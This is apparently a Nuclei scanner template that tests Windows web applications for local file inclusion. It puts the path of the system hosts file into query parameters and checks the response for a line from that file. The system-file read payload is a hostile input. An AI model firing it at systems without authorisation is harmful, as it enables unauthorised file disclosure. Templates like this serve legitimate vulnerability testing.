id: windows-lfi-automation

info:
  name: Local File Inclusion - Windows
  author: rix4uni
  severity: critical
  tags: lfi,windows

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    payloads:
      reflection:
        - "c:/WINDOWS/system32/drivers/etc/hosts"

    fuzzing:
      - part: query
        type: replace
        mode: multiple
        fuzz:
          - '{{reflection}}'

    stop-at-first-match: true
    matchers:
      - type: word
        part: body
        words:
          - "# localhost name resolution is handled within DNS itself."